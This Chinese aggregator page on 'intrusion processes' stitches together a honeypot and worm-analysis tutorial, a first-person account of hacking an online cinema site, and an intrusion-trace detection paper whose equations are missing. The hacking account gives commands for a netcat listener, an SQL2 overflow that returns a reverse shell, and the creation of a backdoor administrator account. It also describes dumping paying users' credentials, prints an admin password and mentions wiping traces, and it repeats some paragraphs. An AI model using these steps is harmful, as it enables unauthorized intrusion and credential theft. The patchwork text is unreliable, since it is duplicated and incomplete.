入侵过程

2024-06-04

入侵过程（精选4篇）

入侵过程篇1

本文将介绍如何利用蜜罐技术逆向分析入侵过程。下面先来了解蜜罐技术的一些概念。

蜜罐技术是一种识别攻击者并将其“瓦解”的技术。蜜罐技术通过部署诱饵的主机、网络服务以及信息, 诱使攻击者进行攻击, 减少对实际系统造成安全威胁。更重要的是, 蜜罐技术可以对攻击行为进行监控和分析, 了解攻击者所使用的攻击工具和攻击方法, 推测攻击者的意图和动机。并能追踪攻击者来源, 对其攻击行为进行审计和取证, 从而能够让防御者清晰地了解他们所面对的安全威胁, 并通过法律手段去追究攻击者的责任, 或者通过技术和管理手段来增强对实际系统的安全防护能力。

那么, 蜜罐技术通常有哪些呢?主要包括以下几类。

1) 数据捕获技术。

数据捕获技术, 顾名思义, 指的是利用一些数据捕获软件记录入侵者群体的所有流量, 从他们的击键到他们发送的信息包。只有这样, 我们才能进一步分析他们使用的工具、策略以及目的。

2) 网络欺骗技术。

为了使蜜罐主机对入侵者更有吸引力, 需要采用各种欺骗手段来诱骗攻击者, 它包括网络流量仿真、网络动态配置、多重地址转换等;下面将分别介绍:

2.1网络流量仿真:因为黑客一般喜欢破坏服务器, 这样造成的影响比较大, 自己也比较能获取大的利益, 比较有成就感。而流量正是区分服务器还是一般主机的重要特征。在欺骗系统中产生仿真流量有两种方法。一种方法是采用实时方式或重现方式复制真正的网络流量, 这使得欺骗系统与真实系统十分相似, 因为所有的访问连接都被复制了。第二种方法是从远程产生伪造流量, 使入侵者可以发现和利用。

2.2网络动态设置:真实网络是随时间而改变的, 如果欺骗是静态的, 那么在入侵者长期监视的情况下就会导致欺骗无效。因此, 需要动态配置欺骗网络以模拟正常的网络行为, 使欺骗网络也象真实网络那样随时间而改变。为使之有效, 欺骗特性也应该能尽可能地反映出真实系统的特性。

2.3多重地址转换:地址的多次转换能将欺骗网络和真实网络分离开来, 这样即使蜜罐被攻陷, 也不会影响到真实网络。其基本的概念就是重定向代理服务, 由代理服务进行地址转换, 使相同的源和目的地址象真实系统那样被维护在欺骗系统中。

3) 攻击报警和数据控制。

该技术保证一旦蜜罐被攻陷, 网络攻击者不会利用蜜罐攻击其他系统并造成危害。其难点是如何在控制住数据流量的同时又不引起攻击者的怀疑。在攻击者突破蜜罐后, 他们最需要的就是网络连接, 以便从网络上下载攻击工具包、打开IRC连接等等, 蜜罐允许他们做大部分的“合法”事情。但是对攻击其他系统的“需求”, 比如发起拒绝服务攻击、对外部扫描以及使用漏洞攻击他人的行为, 则一概禁止。这样攻击者不能利用蜜罐作为跳板对其他真实的系统发起攻击, 从而保证了其他系统的安全。

4) 端口重定向技术。

重定向说白了就是通过各种的方法将各种网络请求重新定个方向转到其它位置。例如我们正常使用WEB服务, 而用TELNET和FTP重定向到蜜罐系统中, 但实际上这两个服务端口是没有开启的, 而攻击者在扫描时则发现这两个端口是开放的, 所以攻击者的入侵将变得徒劳。

通过上述技术的综合运用, 我们可以将蜜罐系统模拟成一个操作系统, 通过开放一些端口和弱口令, 并设定出相应的响应程序, 如添加新用户、权限提升、删除添加文件。这样来引诱攻击者上钩。

下面将介绍怎么巧借VMWARE来逆向分析入侵过程。

VMWARE是一个虚拟机软件, 可以在同一台机器上同时运行多个操作系统。它将机器上的一部分硬盘和内存进行组合, 每台机器拥有自己独立的CMOS, 硬盘和操作系统, 我们可以像使用普通机器一样对它们进行分区、格式化、安装系统和应用软件等操作, 还可以将这几个操作系统联成一个网络, 就是我们所谓的密网。这样, 一台机器就可以轻松虚拟出若干台机器。在测试过程中, VMWARE需要一个操作系统作为最基本的平台, 即HOST OS (主系统) , 在HOST OS上运行的其他系统都叫GUEST OS (子系统) 。

1) 搭建虚拟主机测试环境

新建一个虚拟机后, 除了使用默认值, 用户还可以通过配置文件修改参数。这个配置文件相当于新机器的“硬件配置”, 用户可以在配置文件中决定虚拟机的硬盘、内存大小, 是否有串口和并口、是否有网络等等。现在, 首先利用VMWARE虚拟出一个没有安装最新漏洞补丁的操作系统, 然后构建一个具有多个节点的局域网, 进行网络安全测试。参考步骤如下:

1:安装虚拟操作系统。

2:安装系统补丁程序和杀毒软件。防止蜜罐主机不受控制。

3:安装日志服务器。将日志发送到日志服务器上, 防止被攻击者识破这是蜜罐诱捕。这里推荐软件KIWI SYSLOG DAEMON, 它是一个装在服务器上的应用软件, 可以实时显示通过防火墙的所有访问信息, 并可以以文本的形式用日期命名保存在硬盘, 以供查看, 其软件界面如图一所示。

4:安装CMD记录软件。可以记录CMD的操作记录, 并且不在进程列表中显示出来, 对于实时监控黑客在本机上的攻击行为十分有效。

5:安装数据包捕获软件。通过捕获并分析虚拟机上流进和流出的网络数据包, 了解攻击者的攻击技术、利用的系统漏洞和使用的工具等。

这样, 通过“三重捕获”的层层防范措施, 可以确保在不被入侵者发现诱骗的前提下, 尽可能多地捕获攻击行为信息, 包括入侵者的按键记录、CPU利用率、进程列表、使用过的各种协议数据包内容等, 同时充分保证捕获信息的完整和安全。此外还可以分析攻击者所要进行的下一步工作, 以及将捕获的数据不放在蜜罐主机上, 防止被攻击者发现而提早退出。

2) 实施监控测试

1:开始监测扫描行为。蜜罐系统联网后, 通过嗅探软件发现不时有主机对蜜罐进行基于135端口 (远程过程调用) 的扫描, 说明网络中存在大量的随机扫描。

2:对攻击行为进行捕获。通过前面安装的数据包捕获软件SMARTSNIFF发现有一位不速之客对蜜罐进行扫描和攻击, 建立RPC远程连接, 并向蜜罐传送带有恶意代码的数据包。捕获的数据包如图二所示。

3:漏洞分析。通过分析表明这是针对WINDOWS RPC DCOM接口进行缓冲区溢出漏洞的攻击, 漏洞可以通过135、139、445等端口发起攻击。

4:入侵行为分析。最后通过发送到日志服务器上的日志进行分析, 得出该不速之客发送的恶意代码是蠕虫病毒, 并将自己复制到%system%Winregs32.exe下。注册表的列表项如下:

添加如下键值:

现在如果重启蜜罐, 系统会自动运行该病毒程序, 然后扫描网络中其它主机, 且利用135端口的RPC接口缓存溢出漏洞攻击其他有该漏洞的主机并复制自己。这就是该蠕虫病毒具有自动攻击性、自我繁殖的原因。

结语:任何事物的存在都会有利弊, 蜜罐技术的发展也是伴随着各种不同的观点而不断的成长的。蜜罐技术是通过诱导让黑客们误入歧途, 消耗他们的精力, 为我们加强防范赢得时间。通过 (下转第122页) 蜜网让我们在受攻击的同时知道谁在使坏, 目标是什么。同时也检验我们的安全策略是否正确, 防线是否牢固。蜜罐的引入使我们与黑客之间同处于相互斗智的平台, 而不是处处遭到黑枪的被动地位。我们完全相信, 蜜罐技术必将在网络安全中发挥出极其重要的作用, 一场世界上声势浩大的蜜罐技术行动必将到来。

参考文献

[1]鲁立, 龚涛.《计算机网络安全》, ISBN:9787111335054, 机械工业出版社, 2011.4

[2]刘凡馨.《黑客攻防从入门到精通》, ISBN:978730221667, 清华大学出版社, 2010.11

[3]杨章静, 罗冰.《黑客攻防完全掌控》, ISBN:978789499128, 北京银冠电子, 2011.1

[4]杜彦辉.《利用蜜罐技术实现对互联网非法活动进行监控》, ISSN:1007-1784-CN:11-3933/N, 中国人民公安大学学报 (科学版) , 2007.10.

[5]张雪.《基于反蜜罐技术的Honeyd改进及扩展设计》, 北京邮电大学硕士论文, 2010.3.

[6]连红, 胡谷雨.《网络防御中的蜜罐技术研究》, 军事通信技术, 2005.6

[7]余鹏, 王浩.《基于蜜罐的入侵检测系统》, 网络安全技术与应用, 2008.10

入侵过程篇2

入侵“在线影院”全过程

。本以为是免费，谁知问我要账号和密码，我可不想为这个掏钱。怎么办？先探探路。对我而言，入侵的过程是充满乐趣的，它刺激着我大脑的每一根神经，让我兴奋无比。我喜欢体味这种思维无拘放荡的快感，我喜欢沉醉其中。这是营人的风格。于是，X-Scan开始勤恳地跑在了我的桌面上。

破门：久违的溢出工具

用X-Scan对该站点的Server扫描结果出来了，开的端口还不少呢：53、80、1433、3389。可并没有报告说发现有弱口令，看来网管还算比较有责任心。但开了3389端口，意味着可以远程登录，这可是微软给所有Windows用户献上的最大的“木马”。

通过观察，我发现只有在1433端口上下点工夫，想想办法。何不用SQL2溢出工具试试？

先开一个cmd窗口，祭出宝刀netcat，在命令提示符下敲入“netcat -l -p 99”，监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口，键入“sql2 218.147.*.* 61.157.*.* 0”，其中218.147.*.*是对方IP，61.157.*.*是我自己的IP，回车后提示package sent successful。再回过头去看看监听本地端口的netcat，已经变成了C:WinNTsystem32_，这就是对方机器的系统文件夹了，看来是成功溢出了，就这么简单。

我很幸运地得到了对方的一个Shell，而且还是administrator权限的。接下来的操作就轻车熟路了，添加用户，提升权限：在提示符下键入“net user hacker 12345 /add”（在对方机器里创建一个名为hacker，密码为12345的用户），再键入“net localgroup administrators hacker /add”（把用户hacker加入到管理员组），接下来就该是3389远程登录了。

破门：久违的溢出工具

通过观察，我发现只有在1433端口上下点工夫，想想办法。何不用SQL2溢出工具试试？

我很幸运地得到了对方的一个Shell，而且还是administrator权限的，

接下来的操作就轻车熟路了，添加用户，提升权限：在提示符下键入“net user hacker 12345 /add”（在对方机器里创建一个名为hacker，密码为12345的用户），再键入“net localgroup administrators hacker /add”（把用户hacker加入到管理员组），接下来就该是3389远程登录了。

遇阻：寻找VOD电影

首先运行Windows XP自带远程登录器mstsc.exe，填入对方的IP地址218.147.*.*，确定后在登录界面填上我刚创建的用户名hacker和密码12345，顺利地进入了对方的Windows 桌面。

可随后的情况让我呆住了，这台机器一共就C盘和D盘两个盘，容量加到一起也才20GB，这个容量是不可能装下上百部电影的，我要的VOD电影在哪里？

电影文件一定是放在了另外一台机器上，而那台机器一定和这台Server是联网的。同时，经过我对“在线影院”网页文件的分析，也证实了这一点：电影文件不在本地，而是借助MS SQL的索引和归类来远程提取的。这本来就是一个IIS5.0+MS SQL的站点嘛。

我又一次打开了“管理工具”，在里面的“DNS”里也发现了一个名叫“VOD”的节点，IP指向了一个与Server紧邻的地址，我要找的就是这个“VOD”了。考虑到Server和VOD之间密切的通讯关系，我很自然地打开了Server的“网上邻居”，果然不出所料，整个组里就两台机器，正是Server和VOD。双击VOD的图标，该死的系统又提示输入用户名和密码，看来网管在“网上邻居”上访问VOD时没有保存密码，我该到哪儿去找密码呢？

得手：挖出VOD登录账号密码

就在我准备彻底放弃的那一刹那，脑子里突然闪过一个念头：如果网管他自己要看电影怎么办呢？途径不外有二：一是直接在VOD上观看，二就是在server主页上输入他自己的账号密码进行观看。既然途径一我现在没法实现，那么途径二呢？就算网管是直接在VOD上操作文件，可至少在Server的网页上他应该有一个账号用来进行测试之用。

接下来就是在Server这台机器中找账号密码了。直奔Server的MS SQL数据库。用3389登录Server，点击“开始”→“程序”→“Microsoft SQL Server”→“企业管理器”，然后在当前服务器名“Server”下打开“数据库”。发现一个名为“web_new”的可疑库，应该就是它了！打开它，选择其中的“表”，右边就列出了这个库里的所有表名，经过观察分析，锁定了一个名为“ZH_guanli”的表，先看看它的内容。鼠标右击它，选择“导出”→“导出所有行”。就那么一眨眼的工夫，Oh，My God，这不是账号是什么啊？所有的付费用户的账号密码都在这儿呢！呵呵，不好意思，我Copy了所有的列，然后保存到了我的本地机器中。这些账号的第一个就是admin，应该是网管的了，密码为wzl19750529。

接下来擦干净了“脚印”，重新登录网页，输入网管的账号密码，终于看见电影顺利播放了，胜利！

后记：

入侵过程篇3

目前,有关大数据网络入侵过程痕迹数据监测的方法有很多,相关研究也取得了一定的成果,其中,文献[7]依据大数据入侵检测过程中痕迹数据的相关性,提出一种以局部监测为主的痕迹数据监测方法,对痕迹数据采样值的时间序列和事件随机过程特征进行采集,依据待监测数据与特征的符合程度对痕迹数据进行监测。该方法能够使节点之间的数据交换大大减少,然而其未对事件边缘节点进行监测;文献[8]提出一种基于直方图的大数据网络入侵过程的痕迹数据监测方法,该方法通过采集痕迹数据分布直方图信息,对冗余数据进行删除,对潜在的痕迹数据进行监测,大大降低了通信开销,但该方法未分析数据间的空间相关性,同时只适用于一维数据;文献[9]提出一种基于距离技术识别的大数据网络入侵过程的痕迹数据监测方法,该方法采用聚集树结构以减少通信能耗,依据距离对痕迹数据进行识别,从而实现痕迹数据监测。然而因为该方法仅分析了痕迹数据间的时间相关性,不适用于大数据网络的痕迹数据监测;文献[10]提出一种基于聚类的大数据网络入侵过程的痕迹数据监测方法,该方法通过聚类将和痕迹数据相似的数据聚集在一起,无需数据分布的先验知识,但该方法无法为簇宽度参数设置有效的值,而且该方法主要依据数据实例间的距离计算,计算复杂度。

针对上述方法的弊端,提出一种基于模糊聚类概率的大数据网络入侵过程的痕迹数据监测方法,将采集的痕迹数据转换成频域信号,采用核主元分析对痕迹数据信号频域特征进行提取。对待监测数据和痕迹数据之间的特征模糊聚类概率进行计算,通过衡量理论进行对比分析使大数据网络入侵过程中的痕迹数据被完整的监测。实验结果表明,所提方法不仅所需时间少,而且监测精度高。

1 痕迹数据特征提取与检测原理分析

对大数据网络入侵过程的痕迹数据进行监测前,需对其特征进行提取,这里的特征主要指的是频域特征。将采集的痕迹数据转换成频域信号,对其进行频谱或功率谱分析,依据时间变化的幅值将其转换成随频率变化的功率。频谱的分析主要依据频率中心fFC、均方根频率fRMSF和根方差频率fRVF,分别代表了信号主频位置、主频变化和功率谱的集中程度,公式依次描述如下:

式中,S(f)用于描述功率谱。则将采集的痕迹数据转换成频域信号的公式描述如下:

所有痕迹数据信号的频域特征均可通过一个特征向量进行描述,由特征向量构成的空间被称作是特征空间。本节采用核主元分析(KPCA)对痕迹数据信号特征进行提取,该方法为主元分析的非线性推广,其基本思想如下:利用非线性转换将大数据网络入侵过程的样本痕迹数据信号从输入空间映射至高维特征空间,再在高维特征空间中通过PCA进行痕迹数据信号的频域特征提取,下面进行详细的分析。

假设x为n维痕迹数据向量,{xi,i=1,2,…,N}用于描述x的一个痕迹数据信号样本集,通过非线性H将样本痕迹数据信号从空间Rn映射至高维特征空间Rt,再在该高维特征空间中实现主成分分析。

假设H(x)i已去均值,则H(x)i的协方差矩阵C可描述成

式(5)中的特征值与特征向量之间的关系可描述成

式(6)中,特征值λk≥0,vk(k=1,2,…,t)用于描述特征向量。

将式(6)代入式(5)有

式(7)中,内积。

令和全部非零特征值λk相应的特征向量vk处于{H(xi),i=1,2,…,N}形成的平面中,以存在不全是0系数[Ti,i=1,2,…,N],使

通过式(6)~式(8)可获取

假设N×N矩阵用Kij=k xi(,x)j=<H(x)i,H(x)j>进行描述,其中k xi(,x)j为符合Mercer定理的核函数,将式(5)化简成NλkKT=K2T,则有

式(10)中,T=[T1,T2,…,TN]T。

则K的特征值与特征向量可描述成Nλk与Tk,k=1,2,…,N。将特征值按照从大到小的顺序排列,如果前m个特征值之和占总特征值和的比值超过既定阈值,则认为主元数量是m。

为了对特征向量vk进行归一化处理,还需对T进行规范化:,则可获取测试痕迹数据信号样本xi在Rm空间中的第k个主向量vk上的投影,也就是xi的特征值

通过以上方法完成数据特征的提取与检测。

2 痕迹数据监测实现过程分析

在对大数据网络入侵过程的痕迹数据进行监测的过程中,最关键的步骤为求出待监测数据与痕迹数据之间的特征模糊聚类概率,需在上节提取的痕迹数据特征值的基础上,构建一个数学模型对特征模糊聚类概率进行描述,该模型主要由n个待监测数据与p条相关性较大的痕迹数据构成,塑造一个大小为n×p的矩阵,用Cn×p={cjk}n×p进行描述。

为了得到大数据网络入侵过程的待监测数据和痕迹数据之间的关系,简化计算过程,减少运算时间,需要对矩阵进行降维处理

式(13)中,ρj用于描述矩阵相关性系数;wj用于描述权值系数。若在符合上述条件的基础上,l无限接近于rank(B),则Cl和Cn×p将无限接近。完成对矩阵的降维处理后,则可获取与监测痕迹数据相关的节点数据,过滤掉很多无关数据,提高了痕迹数据监测效率。

假设p为大数据网络入侵过程中痕迹数据的数量;ek为第k个扫描节点。按照相关性将痕迹数据划分成L类,其特征为(v1,v2,…,vn),n用于描述待监测数据的数量,ek(vk1,vk2,…,vkn)用于描述网络数据,则ek为大数据网络入侵过程中所有待监测数据。依据特征模糊聚类概率对痕迹数据进行监测,需将待监测数据ek依据不同的特征进行分类,判断大数据网络中的数据是否为痕迹数据时,需通过式(14)对待监测数据和痕迹数据之间的特征模糊聚类概率进行计算

式(14)中,q(cj)用于描述对不同种类待监测数据进行监测时,获取的数据和痕迹数据之间的特征匹配概率;q(fk)用于描述待监测数据与入侵数据的匹配概率;χn为常量,用于调节概率参数。若监测数据相同,则q(fk)将保持不变;q(fkcj)用于描述待监测数据和痕迹数据之间的关系。上述变量的公式描述如下:

式中,T(p(cj)fk)用于描述ek类中出现的痕迹数据的数量;Tek用于描述大数据网络入侵过程中待监测集合中属于痕迹数据的数量。j用于描述待监测样本数量。将Q(fk)超过既定阈值的待监测数据看作是痕迹数据,从而实现大数据网络入侵过程中痕迹数据的监测。

为了使大数据网络入侵过程中的痕迹数据被完整的监测,需通过衡量理论进行对比分析,使其满足下述条件

式(18)中,a用于描述痕迹数据衡量标准。在对大数据网络入侵过程的痕迹数据进行监测时,痕迹数据与其他数据相关性概率之和为1,也就是

依据(19)式有

完成对a的优化处理后,若q(f=cosχ)无限接近于1,则痕迹数据监测效果将较好。

3 实验结果仿真

为了验证本文提出的基于特征模糊聚类概率的大数据网络入侵过程痕迹数据监测方法的有效性,需要进行相关的实验分析。实验将马尔科夫方法作为对比进行分析。在Window 7.0,CPU是Intel Pentium Dual Core的微机环境中,通过Oracle9.2数据库管理系统进行编程,完成下述模拟实验。

分别采用本文方法和马尔科夫方法对大数据网络入侵过程的痕迹数据进行监测,对两种方法的查全率和查准率进行比较,得到的结果用表1进行描述。

分析表1可以看出,采用本文方法对大数据网络入侵过程的痕迹数据进行监测,得到结果的查全率与查准率均远远高于马尔科夫方法,说明本文方法的监测精度较高,验证了本文方法的有效性。

分别采用本文方法和马尔科夫法对大数据网络入侵过程的痕迹数据进行监测,将得到的结果和实际结果进行比较,给出监测误差曲线,用图1进行描述。

分析图1可以看出,采用本文方法对大数据网络入侵过程的痕迹数据进行监测,得到的误差曲线在0.05上下波动,而采用马尔科夫法得到的误差曲线基本在0.2以上,明显高于本文方法,说明本文方法对痕迹数据的监测精度较高。

为了进一步评价两种方法的性能,采用ROC(rtecciver operating characteristic)曲线对监测正确率与误报率之间的关系进行描述,两种方法的ROC曲线用图2进行描述,横坐标代表误报率,纵坐标代表准确率。

分析图2可以看出,采用本文方法得到的ROC曲线监测准确率达到90%以上时,马尔科夫法的ROC曲线监测准确率只有70%左右,同时本文方法的误检率明显低于马尔科夫法,进一步验证了本文方法的监测性能。

分别采用本文方法和马尔科夫法对本文方法和马尔科夫法进行相同实验所需的时间进行比较,得到的结果用表2进行描述。

分析表2可以看出,在相同的实验条件下,采用本文方法对大数据网络入侵的痕迹数据进行监测所需的时间明显少于马尔科夫法,这是因为本文方法分析了正常数据与痕迹数据之间的关系,大大减少了计算量。

4 结论

本文提出一种基于模糊聚类概率的大数据网络入侵过程的痕迹数据监测方法,将采集的痕迹数据转换成频域信号,对其进行频谱或功率谱分析,依据时间变化的幅值将其转换成随频率变化的功率。采用核主元分析对痕迹数据信号特征进行提取,利用非线性转换将样本痕迹数据信号从输入空间映射至高维特征空间,在高维特征空间中通过PCA进行痕迹数据信号的频域特征提取。构建一个数学模型对特征模糊聚类概率进行描述,对待监测数据和痕迹数据之间的特征模糊聚类概率进行计算,通过衡量理论进行对比分析使大数据网络入侵过程中的痕迹数据被完整的监测。实验结果表明,所提方法不仅所需时间少,而且监测精度高。

摘要：大数据网络数据规模巨大,对入侵过程痕迹数据进行监测的效率通常较低,一些带有入侵痕迹的数据特征在大数据环境下,特征逐渐淡化,当前方法无法在淡化的情况下准确采集痕迹数据的特点,无法形成待监测数据与痕迹数据之间的关系,导致监测效率和精度低下。提出一种基于模糊聚类概率的大数据网络入侵过程的痕迹数据监测方法,将采集的痕迹数据转换成频域信号,对其进行频谱或功率谱分析,依据时间变化的幅值将其转换成随频率变化的功率。采用核主元分析对痕迹数据信号特征进行提取,利用非线性转换将样本痕迹数据信号从输入空间映射至高维特征空间,在高维特征空间中通过PCA进行痕迹数据信号的频域特征提取。构建一个数学模型对特征模糊聚类概率进行描述,对待监测数据和痕迹数据之间的特征模糊聚类概率进行计算,通过衡量理论进行对比分析,使大数据网络入侵过程中的痕迹数据被完整的监测。实验结果表明,所提方法不仅所需时间少,而且监测精度高。

关键词：大数据网络,入侵过程,痕迹数据,监测

参考文献

[1]王曙霞.大数据环境下的网络主动入侵检测方法研究.科技通报,2015;31(8):225—227Wang S X.Big data under the environment of network intrusion detection method actively study.Science and Technology,2015;31(8):225 —227

[2] 宋文超,王烨,黄勇,等.大数据环境下的云计算网络安全入侵检测模型仿真.中国西部科技,2015;(8):86—88Song W C,Wang Ye,Huang Yong,et al.Under the environment of big data cloud computing network intrusion detection model simulation.Journal of Safety Science and Technology in Western China,2015;(8):86—88

[3] 曹旭,曹瑞彤.基于大数据分析的网络异常检测方法.电信科学,2014;30(6):152—156Cao Xu,Cao R T.Network anomaly detection method based on large data analysis.Journal of Telecom Science,2014;30(6):152—156

[4] 陈玉明,谢斐星,吴克寿,等.基于邻域关系的网络入侵检测特征选择.常州大学学报:自然科学版,2014;26(03):1—5Chen Y M,Xie F X,Wu K S,et al.The network intrusion detection based on neighborhood relation feature selection.Journal of Changzhou University:Natural Science Edition,2014;26(3):1—5

[5] 李天枫,姚欣,王劲松.大规模网络异常流量实时云监测平台研究.信息网络安全,2014;(9):1—5Li T F,Yao Xin,Wang J S.Large scale network anomaly traffic realtime monitoring platform of cloud study.Information Network Security,2014;(9):1—5

[6] 程源,楚春颖.一种基于PSO辨别树的P2P网络入侵检测方法.科技通报,2013;(6):56—58Cheng Yuan,Chu C Y.A P2P network intrusion detection method based on PSO to identify trees.Science and Technology,2013;(6):56 —58

[7] 阳时来,杨雅辉,沈晴霓,等.一种基于半监督GHSOM的入侵检测方法.计算机研究与发展,2013;50(11):2375—2382Yang S L,Yang Y H,Shen Q N,et al.An intrusion detection method based on a semi-supervised GHSOM.Journal of Computer Research and Development,2013;50(11):2375—2382

[8] 袁遇晴,况湘玲,凌利军.基于数据挖掘的网络入侵检测研究.计算机安全,2014;(7):14—17Yuan Y Q,Kuang X L,Ling L J.Network intrusion detection based on data mining research.Computer Security,2014;(7):14—17

[9] 吴琼.云计算环境下的联合网络入侵检测方法仿真.计算机仿真,2015;32(6):276—279Wu Qiong.Cloud computing environment of network intrusion detection method Simulation.Computer simulation,2015;32(6):276—279